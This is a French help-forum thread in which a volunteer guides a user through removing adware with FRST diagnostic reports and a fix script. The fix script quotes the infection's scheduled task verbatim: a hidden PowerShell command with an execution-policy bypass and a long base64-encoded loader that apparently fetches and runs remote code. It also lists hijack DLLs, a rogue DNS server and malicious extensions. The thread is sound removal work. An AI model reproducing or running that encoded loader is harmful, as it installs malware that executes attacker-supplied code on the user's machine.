Auteur Sujet: ouverture de pages de pub inopinées malgré mon anti virus  (Lu 24390 fois)

0 Membres et 1 Invité sur ce sujet

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Bonjour et meilleurs voeux 2016

Je possède un portable HP avec un anti virus McAfee.
il y a des pages de pubs qui s'ouvrent systématiquement m'indiquant que mon ordinateur est infecté et je n'arrive pas à m'en débarrasser pouvez vous m'aider svp?
A bientôt
Marie

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #1 le: janvier 09, 2016, 10:11:52 »
bonjour

on va utiliser un outil de diagnostique



/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

choisis ci-dessous la version compatible avec ton système (32 bits ou 64 bits)
et Important, Enregistre FRST sur ton Bureau

Clique sur ce lien si tu ne sais pas: Comment savoir quelle version 32 bits ou 64 bits est exécutée sur mon système ?


Sous Internet Explorer et Edge, le filtre SmartScreen peut déclencher une alerte. Cliquer sur Actions ou Informations complémentaires puis sur Exécuter quand même


  • Ferme toutes les applications, y compris ton navigateur
  • Double-clique sur FRST.exe et clique sur Oui pour accepter le Disclaimer
    /!\ Sous Vista, Windows 7 , 8.1 et 10, il faut lancer le fichier par clic-droit -> Exécuter en tant qu'administrateur
  • Sur le menu principal, clique sur Analyser et patiente le temps de l'analyse
  • A la fin du scan, un rapport FRST.txt s'ouvre.
  • A son premier lancement, l'outil va aussi créer un fichier nommé Addition.txt
  • Héberge ces rapports sur ce site d'hébergement de fichiers et indique les liens fournis dans ta réponse. Aide en images
    Les rapports sont enregistrés au même emplacement que l'outil et sous C:\FRST\Logs
*****


tu as donc deux rapports à fournir
--> FRST.txt
--> Addition.txt

Hors ligne delph

  • Membres
  • Members
  • Messages: 27

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #3 le: janvier 10, 2016, 17:48:55 »
re

le rapport FRST.txt est incomplet
Peux tu le refaire, stp

il doit finir par:
==================== Fin de FRST.txt ============================


***


En attendant

Tu as deux antivirus actifs sur ton système, ce qui peut engendrer des conflits et rendre instable ton système

Désactive
--> sois Windows Defender
--> sois McAfee


***


Depuis l’écran d’accueil de Windows , tapes programmes , choisis la catégorie Paramètres et ouvrir Ajouter ou supprimer des programmes

Désinstalle via Panneau de configuration -> Désinstaller un programme:  (si un programme ne veut pas se désinstaller ou bien absent de la liste, passes à la suite)

--> Setup (HKLM-x32\...\{7ADF667E-E14D-4D2C-827C-B0108F0D93BC}) (Version: - )
--> Web Shield (arnaque)


--> Adobe Shockwave Player 12.0 (pas à jour = faille de sécurité) 


***

en attente du rapport FRST.txt

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #4 le: janvier 10, 2016, 20:42:17 »
Re bonjour,

Windows 8 me dit que Windows defender est déjà désactivé.
Je n'ai pas réussi à désinstaller WEB SHIELD.

J'ai remis les 2 fichiers.
http://up.security-x.fr/file.php?h=R2274fe86b22ccbd4ba0eb133317e19e9
http://up.security-x.fr/file.php?h=R2274fe86b22ccbd4ba0eb133317e19e9

merci encore

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #5 le: janvier 11, 2016, 17:10:25 »
re

Arf, tu as posté deux fois Addition.txt

Tu dois avoir sur ton bureau un fichier FRST.txt
Peux tu vérifier ?

Si tu ne le trouves pas, ce n'est pas grave
Sur ton bureau, tu fais un clic droit sur FRST.exe et choisis exécuter en tant qu'administrateur
Tu cliques ensuite sur Analyser et tu auras FRST.txt

Hors ligne delph

  • Membres
  • Members
  • Messages: 27
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #6 le: janvier 11, 2016, 18:21:42 »

Hors ligne xsun

  • Formateur
  • Mega Power Members
  • ****
  • Messages: 3518
Re : ouverture de pages de pub inopinées malgré mon anti virus
« Réponse #7 le: janvier 12, 2016, 19:10:14 »
re

il faut faire attention lors de l'installation de logiciels, ce n'est pas anodin
Il faut décocher les cases pré-cochées des sponsors, ton antivirus n'y peux rien puisque l'installation est validée


***

FRST - Correctif :

--> Ouvre le Bloc-notes Aide en image pour ouvrir le bloc note windows 8
Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes
--> de start inclus dans le copié à end inclus dans le copié

start
CreateRestorePoint:
CloseProcesses:
Task: {4373446F-0D4A-443A-8CA7-8568104AF489} - System32\Tasks\{23474816-CA3A-4A9F-821D-2D4062F66B49} => pcalua.exe -a C:\ProgramData\WebShield\uninstall.exe -c /kb=y /ic=1
Task: {7C298525-876A-4277-8EF2-BACC167EFC4A} - System32\Tasks\{7A7D7A47-0A7D-080A-7811-7D057D09110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAbwByAGEAbABsAHMAaABvAHAALgBpAG4AZgBvAC8AdQAvAD8AYQA9AGwAVgAxAEoARgByAE4AagBrADcAZQBqAHoAZABVAHMATgB6ADgASQBFAG0AYwB0AE0AaQA0AEQAVQBEADAATgBLAG8AZwBGAEEAVQBlAGoAOAB0AE4AWgBqAHYAMgBSAEsAMwBIAFEAMQBNAGwAMQAwAHYANgBXAFcASgBiAFQATQBxAFoAcQB2ADIASQA5AGYAQwBNAHgAbgBrADQAaAA1AHUAVwAzADgAUgBnAGkAbwBQADEAQgBvAHgAdABNAGIAUwBUAF8AdQBSAGEAYQB5AEsATABsAGMAegBTAGcAdQBqAGYAWABIADgAYQBvAEUAcABxAEIAaQA2AHMAZgBwAGoANQBDAEoARgBsADYARABIAEoAcQBhAEwAWQB2AEoAbgA3AEkATABaAGkAZwBLAHYAbwB2AGQARQBTADIARQBhADkAdwBoAGQAawBHAFIASwBIAHkAQgBLAFUAUgBNAEgAeABGAFIATgBXAEEAdQAtAE0AbgBVAFkATAB1AEgAZQBtADYAUgBMAHcATQBlAEYAdAA4AHAAeABlAC0AYwBGAHMAMwBXAGMAdwB0AEYAYQBDAFUATQBaAFkAWABjAEIAZgBKADIASQBVAGMATQBNAE8AXwBwAHgAMgBaAGUAOQBrAGUAdAA2ADMAWABPAEoAVABSAFYAOAAyAEEAVwBYAFAAawB1ADQAawBQAGEAdgBNAEkAZQBjAEQATQBWAEMAYQBNAG8AOQBxAGkAQgA4AHoATgA1AEQANwBHAGMAeQBpADQAeABVAGYAdABvAHAASgByAHEAawAxAHMANABQAG0AQwBJAGcAcQB3AG0AOQA5AG0AagA0AHoANwBmAEgANQBvAEIAUwBTAGUAQgBvAGsANQA4AEIAYQBJAGwASgBMAEkAcQBVAG0AegBLAEkAdwBjADMAdABQAGIAWABmADEANwBNAGcAMgB3AHYANwBOAE0AZwBQAGIAWQBtAEIAWgB5AHYAMgBKAGIAOABjAHkATAAyAHoAcwBRAF8AaABaAEYAaQB4AGYAYQBBAGQAYQBFAHIAQwBNADEAVQBsAC0AMABuAEYASgA2AEsAeABLAFAATgBKAEgAaABGAGEAMQA5ADcASgBFAEQAVgBaAEEAYwBzAHgASABhAE0ARgA0AEYAaQBNAG8ANQBHAEMAUQBGAHgAbABuAFkAbQBDAGMAUAB2AEQAaABSAFMAdQBoAFYALQBHAEsAcABhAE4ARABPAEcAYgAzAHMAVwBQAEMANwBhAFQAagBuADgAeQBFAEkAbQBfAEkAdABJAEgAdQBCADYAdwBtADMAWQBlAE8AUwBJAGIAUAB2AGMAYQBlAEEAZwA3ADUAWQB1ADIAeAAwAFQAWQBQAHYAYgBkAGoAUgBRAC0AXwBQAEMANwBPAEgAUwAyAGYAUwBuAHoAVwAyAGsAaQBpAHcAMwA4AEoAQgBjAGYAYwBqAEsASQAxAGEAUwBMAHcATABzAHQAZgBwAEUAMgBTADYARQBmAEwAdgBPAEIAWgBWAGoATwBUAHgARAByADkAagBJAFoAWQAyAGMAdABHAEUAVgBnAEkAcQBtAE8AaABNAHQAbwBQAHMAawBJAHYAdQB5ADUAaABTAC0AcABUAF8AbQAyAEIAUgA3AGMAbgBrAGcAagBLAG8AMwB5AEsAcgBJADAATwBKAFIAbABQAFQANwAxAFgATwBSAFEALQB5AGsAWgBGAEIAUwBzAHcAcwB6AFgAbgBaADkAYgA4AGYAOABBAHEAUgBGADgAVQBsAGEAdgB5AHkAVQBWAGQATABCADQAMgB2ADAAYwB6ADIAUgBBAFAAcwBQAGMAZwB1AFoANABaAFMAdgAzAHAAaQBvAEwARwBrAFMATQBlAGYAQgBOAGIAYQByAEMAOQBXAG0AegBGAEUAUgBWAG8AdABpADMAbgBDAE8AMgBhAGsARAA0AHUAaQBQADMAagBmAGMAWgB1AGYAbQAyADgATgAzAGgARABYADMAcgBPAEQAUgBsAHIAdgBTAE4AWgBQAE0AUwAzAEMAeQBpADUAdAB1AGcAZwBBAHkAdQAwAEYAbwBFADQATAB3ADEAcwBxAFYAQgBwAHMANQA4AHoAZQBDADgAcQA5AGgARQA0ADgAYgBhAFIAMwBIAFEAcgBuAGMAUwBOAFgAdwBhAHoATgBPAHQAMgBOAFoAUAB0AFUAaQAwAGwATABMAE0AQQBNAHEARQBZAGsARQBoAEwAcgBiAC0ATQB0AEwAcwB0AGoASwByAEQAZwBDADUAdwA4ADYAdQBXAEsAWQA0AFAAagBIAGMAbwBvAGMAaQBxAFkAbgBxAG0AdQAtAEkAMwBsAHEAdgAmAGMAPQBlAEQATAB6AGcASwBBAEsAOQBMADcAUgBGAGcASABYAHAAWQB3AEUAeQBPADkAaABOAHkAcABoAEEAegBhAGgAeQAzAHMARABZAG0ANABPAFoATgA0ADAAZgBRADAARwBhAEYAMwB1ADkAVgBiAEMAWQB3AFAAdwBOADcATwBiAEQASwBaADQAbABGAEYAZwBBAC0AeQBGAFQAMwBlADYASgBWAE0AZQAtAHgAOQBlAG8ATABEAGsAeQAyAEsAXwA3AEQAdQBfAGkAYwBZAHQAQQBuAGkATwBpAE4ANAA1AFEAdgByADUANgBXADYAdwAzAFgAcwBsAGYAXwBwAEMAaABzAEgAdgBLAEEAWABQAFoAdgAtAHcAaQBnAFUAWgB6AHUAVwBIAHIATQB5AHIAUgB4AF8ASgBRAE8ARQB6AEsASwBKAHoASgA3AEcAZQBGAGIAQgA0AHIANQBjADYAdABhAHAAbgB0AFoATABxAFIATABUAHQAWgBxAHIAYwBPADEAaABvAEwANQBhAGMASQBGAHQAWgBXAFQAZABOAFIAXwBrAHMAcAB2AFQAQQBrAEUAcwBSAFoAQwBxAHAARQBoAGoARgBjADUAcABCAHMAUABwAFQAMAA1AFcAeQBLAGYAZwBjAGsAMABPAFcATABPADIAYwBRAHAAVAB2AEYAMABJAHUAawBLAGwAUgBOAFkAQwA3AHgAbABiAHMAZwAzAEQAWgAtAFMAawBWAEgAeQBwAFAASgA0AE4AaQBmAG8ALQBzAG8AcgBFAG4AZgBVAFgAZgBiAGMAcwBmAEMANgBfAEsAdQBVAE8AbgBJADYANgBTAGcAMwBRAEQAdwA2AE0ANwBjAHIATQB0AE4ANAB0AEgAawBOADAAUQA5ADMANABXAEMAcwBQAEEATgBlAFUAOQBMAFMAOQBmAFgARgB2AHAATgB6AGQAZQBGAGcAZgBZAEoAQwAxAGgAdgBEAEUAYgA0AGwAUgBfAFIAcAAtAC0AaQBnAEsAMwBQAE0AeQBjAEQAUABpAGQAcgBlAEUAcgBvAFAAcABDAHQAcABCAG8AZQBxAGwAQgBBAGkAUQBnAEIAcgBoAFUAWAA3AGsAMABkAFIAdgAxAGYAZAB4AFQAVgBkAHoASQBmADIASQBvAEEAeAB3AE8AWgBCAGEAYgA3AFgAVwB4AEwATwBMAHEAaABCAEMAUgAzAEMAQwBnAEUAQgB6AFQANABHAE4AMgBXAGQAMgA0AC0AbwBxAFgAcgB1AHQAbQBCADYAWgAxAGIAbwBuAE0ARQBKAEYAMwBlAEQAegBnAGgAWgBuAGYAVQBjADEAZwBlAGsARABrAGgAMABIAE4AMQBUAEIAdABoAGoAcABhAFMAMABIAGEANABWAFkARABzAG4AQwBEAGUAdABHADUAMABqAE4AdQBuAHcARgB6ADUAMgA1AG4ARQBoAEoANQBvAEgAaABPAFgAUABIAGcAeABPAEwAMABBAC0AbQBCAGMAagBaAFUAOQAwAHYAUwB3AE8AZABnADgAVABOAFAAZQA5AE4AdQAtAE0AcgBnAEwAXwBjAHoAcABRAGcANQA1AFAANQBfAGEARgBNAC0AegBqAGMAMwBiAHYAeABHAFIATQA0AEEAYwBMAEYAYgBmAEQAeQBUAEMAMQBZAGQATABHAGoAVQAxAGoAZwBxADMASQBWAEEANQBaAEoAMgA4AHUARABWAEUATwA5AGMATQBKAGkAVAB4AFkAZgBkAFgARQBaAHoAQQB4AGYAVwBqAHcAQwBfAFUAYgBZAFIAeQBsAFIAVgBhAGEAOQB5AEIAcABJAHIAdQBIADIARABzAGsARABpAHEAZQBPAHoAdgBfAG0AUwBvAEYAYwBMAFAAMABoAFQAcABtAFgAQgBMAE8AeQBWAHgANgBoAEcAUwBVAHQAeABBAFUAdgBXAEkAYwAyADAAZAAtAHIAMQBUAEYANQB3ADMAMQA1AFUAbwBUADAAUQB4AFUAQgA5ADgANwBUAGkAUQBYAFYAcwA4AEwAQgBNAHEAMgBrAFcAYwBaAFcARQBZAEIASABhADUAcgBBAFkAdgBhAGEAWgBrAEMALQBhADYAaABOAFoAVwA0AHgAQgBHAFQARwBWADIAcwBNAC0AeQBqAE8AVAB3AHkAbwBUAGcAaABIAGgARgBPAE8ARgA4AFoAZQB6AFgAUQBSAGcANwB4AF8ANwBYADEAWQBrAGIARwBEAFAAdwAxAFcATgBBAG4AbgBmAFIAUgBWAFAAQwBxAGsATQBpADMAMABpAEUARQA0AFMANwBzAEMAdgA5AE8AdQBIAHgAWgA3ADIAagBhAEIAcQBJAEYARgB3AG0AaQBaAEMATABTAHUAbgA1AEQAWgBuADAAXwBOAFoAQgBWAHQAVwBLAFQAYwBXACYAcgA9ADQAOAA4ADgAMAA1ADUAOQA3ADIAMQA2ADkAOQAxADcAOAAxADIAIgA7ACQAcwB0AHMAawA9ACIAewA3AEEANwBEADcAQQA0ADcALQAwAEEANwBEAC0AMAA4ADAAQQAtADcAOAAxADEALQA3AEQAMAA1ADcARAAwADkAMQAxADAAQgB9ACIAOwAkAHAAcgBpAGQAPQAiAFMAeQBzAHQAZQBtAEgAZQBhAGwAZQByACIAOwAkAGkAbgBpAGQAPQAiAFYAMgAzAFoAMgBWADEAVgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwB9ACQAdgA9AFsAUwB5AHMAdABlAG0ALgBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoATwBTAFYAZQByAHMAaQBvAG4ALgBWAGUAcgBzAGkAbwBuADsACgBpAGYAKAAkAHYALgBNAGEAagBvAHIAIAAtAGUAcQAgADUAKQB7AGkAZgAoACgAJAB2AC4ATQBpAG4AbwByACAALQBsAHQAIAAyACkAIAAtAEEATgBEACAAKAAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AUwBlAHIAdgBpAGMAZQBQAGEAYwBrAE0AYQBqAG8AcgBWAGUAcgBzAGkAbwBuACAALQBsAHQAIAAyACkAKQB7AGIAcgBlAGEAawA7AH0AfQAKAGkAZgAoAC0ATgBPAFQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMASQBkAGUAbgB0AGkAdAB5AF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAKAApACkALgBJAHMASQBuAFIAbwBsAGUAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBCAHUAaQBsAHQASQBuAFIAbwBsAGUAXQAgACIAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgAiACkAKQB7AGIAcgBlAGEAawA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIAB3AGMAKAAkAHUAcgBsACkAewAkAHIAcQA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAHIAcQAuAFUAcwBlAEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzAD0AJAB0AHIAdQBlADsAJAByAHEALgBIAGUAYQBkAGUAcgBzAC4AQQBkAGQAKAAiAHUAcwBlAHIALQBhAGcAZQBuAHQAIgAsACIATQBvAHoAaQBsAGwAYQAvADQALgAwACAAKABjAG8AbQBwAGEAdABpAGIAbABlADsAIABNAFMASQBFACAANwAuADAAOwAgAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACkAIgApADsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAcgBxAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAHUAcgBsACkAKQA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABkAHMAdAByACgAJAByAGEAdwBkAGEAdABhACkAewAkAGIAdAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAByAGEAdwBkAGEAdABhACkAOwAkAGUAeAB0AD0AJABiAHQAWwAwAF0AOwAkAGsAZQB5AD0AJABiAHQAWwAxAF0AIAAtAGIAeABvAHIAIAAxADcAMAA7AGYAbwByACgAJABpAD0AMgA7ACQAaQAgAC0AbAB0ACAAJABiAHQALgBMAGUAbgBnAHQAaAA7ACQAaQArACsAKQB7ACQAYgB0AFsAJABpAF0APQAoACQAYgB0AFsAJABpAF0AIAAtAGIAeABvAHIAIAAoACgAJABrAGUAeQAgACsAIAAkAGkAKQAgAC0AYgBhAG4AZAAgADIANQA1ACkAKQA7AH0ACgByAGUAdAB1AHIAbgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
Task: {D3923B72-B127-42A9-BE03-4122F9F60115} - System32\Tasks\Dlaauafoomg => C:\ProgramData\Dlaauafoomg\1.0.7.1\iofurhab.exe [2015-12-21] ()
HKLM\...\Run: [3D BubbleSound] => "C:\Program Files\BubbleSound\3D BubbleSound.exe" 
HKLM-x32\...\Run: [mpck_en_004090183] => [X]
Winsock: Catalog9 01 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 02 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 03 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 04 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9 16 C:\Windows\SysWOW64\Xebzuta.dll [289128 2015-12-22] ()
Winsock: Catalog9-x64 01 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 02 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 03 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 04 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Winsock: Catalog9-x64 16 C:\Windows\system32\Xebzuta64.dll [375144 2015-12-22] ()
Tcpip\..\Interfaces\{27C6EE60-3845-4EE0-87F1-C0A841FF81EE}: [NameServer] 104.197.191.4 
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF HKLM\...\Firefox\Extensions: [{C046C13D-2B16-478B-a0DE-133F81EBFCBA}] - C:\Program Files\shopperz221220151212\Firefox\{C046C13D-2B16-478B-a0DE-133F81EBFCBA}.xpi => non trouvé(e)
FF HKLM-x32\...\Firefox\Extensions: [{C046C13D-2B16-478B-a0DE-133F81EBFCBA}] - C:\Program Files\shopperz221220151212\Firefox\{C046C13D-2B16-478B-a0DE-133F81EBFCBA}.xpi => non trouvé(e)
CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=sy&ts=1439716213&z=1b402b73c9149486e8baeb9gbz3c3tam0g3q9o9g0c&from=age&uid=ST1000LM024XHN-M101MBB_S31LJ9AG316460
CHR Extension: (Recherche Google) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-12-29]
CHR Extension: (Lastie) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\dimfohdigjaffdaanhmbocfkpolglnjk [2015-12-29]
CHR Extension: (Smart Display) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\engaigpbgdjjmanonjcjkcmomgibneba [2015-12-29]
CHR Extension: (Search People) - C:\Users\MARIE\AppData\Local\Google\Chrome\User Data\Default\Extensions\papbadoldddalgcjcicnikcfenodpghp [2015-12-29]
R2 sefSYs; C:\ProgramData\FyyMnPGnu\sefSYs.exe [3000824 2015-12-21] (Irrational Number Applications)
S2 Ravgug; "C:\Users\MARIE\AppData\Roaming\PohetFobvae\Ogokgoml.exe" -cms [X] 
U3 mfeaack01; pas de ImagePath
U3 mfeavfk01; pas de ImagePath
U3 mfehidk01; pas de ImagePath
2016-01-06 08:21 - 2016-01-06 08:19 - 00013752 _____ (Microsoft) C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe
2016-01-06 08:21 - 2016-01-06 08:19 - 00000182 _____ C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe.config
2016-01-06 08:19 - 2016-01-06 08:19 - 00000000 ____D C:\Users\MARIE\AppData\Local\speed browser
2015-12-24 18:14 - 2016-01-06 20:00 - 00000000 ____D C:\ProgramData\Radio
2015-12-24 17:49 - 2015-12-24 17:49 - 00000000 ____D C:\WebShield
2015-12-22 13:25 - 2015-12-22 13:25 - 00000000 ____D C:\Windows\system32\rejb
2015-12-22 13:21 - 2015-12-22 13:21 - 00004760 _____ C:\Windows\SysWOW64\Xebzuta.ini
2015-12-22 13:21 - 2015-12-22 13:21 - 00003340 _____ C:\Windows\System32\Tasks\Woeno
2015-12-22 13:21 - 2015-12-22 13:21 - 00002480 _____ C:\Windows\SysWOW64\XebzutaOff.ini
2015-12-22 13:21 - 2015-12-22 13:21 - 00002480 _____ C:\Windows\system32\XebzutaOff.ini
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\Users\MARIE\AppData\LocalLow\Company
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\Users\MARIE\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\Users\MARIE\AppData\Local\Tempfolder
2015-12-22 13:21 - 2015-12-22 13:21 - 00000000 ____D C:\uninst
2015-12-22 13:21 - 2015-12-22 11:14 - 00375144 _____ C:\Windows\system32\Xebzuta64.dll
2015-12-22 13:21 - 2015-12-22 11:14 - 00289128 _____ C:\Windows\SysWOW64\Xebzuta.dll
2015-12-22 11:15 - 2015-12-22 13:21 - 00056728 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\cherimoya.sys
2015-12-22 00:52 - 2015-12-22 13:32 - 00000000 ____D C:\ProgramData\Browser
2015-12-22 13:21 - 2015-12-22 11:14 - 00375144 _____ () C:\Windows\system32\Xebzuta64.dll
2015-12-21 21:29 - 2015-12-21 21:29 - 00003094 _____ C:\Windows\System32\Tasks\{23474816-CA3A-4A9F-821D-2D4062F66B49}
2015-12-21 15:36 - 2015-12-21 15:36 - 00158720 _____ () C:\ProgramData\Dlaauafoomg\1.0.7.1\iofurhab.exe
2015-12-21 15:36 - 2016-01-10 17:44 - 00003442 _____ C:\Windows\System32\Tasks\Dlaauafoomg
2015-12-21 15:36 - 2015-12-21 15:36 - 00000000 ____D C:\ProgramData\Dlaauafoomg
2015-12-21 15:33 - 2016-01-10 19:26 - 00000000 ____D C:\Users\MARIE\AppData\Local\WebShield
2015-12-21 15:31 - 2015-12-21 15:34 - 00000000 ____D C:\ProgramData\FyyMnPGnu
2015-12-21 15:31 - 2015-12-21 15:31 - 00023024 _____ C:\Windows\System32\Tasks\{7A7D7A47-0A7D-080A-7811-7D057D09110B}
2015-12-21 15:31 - 2015-12-21 15:31 - 00000000 ____D C:\ProgramData\15defdac-41e7-0
2015-12-21 15:30 - 2015-12-21 21:29 - 00000000 ____D C:\ProgramData\WebShield
2015-12-21 15:30 - 2015-12-21 15:30 - 00000000 ____D C:\Users\MARIE\AppData\Local\Setup Wizard
2015-12-21 15:30 - 2015-12-21 15:30 - 00000000 ____D C:\ProgramData\15defdac-49d3-1
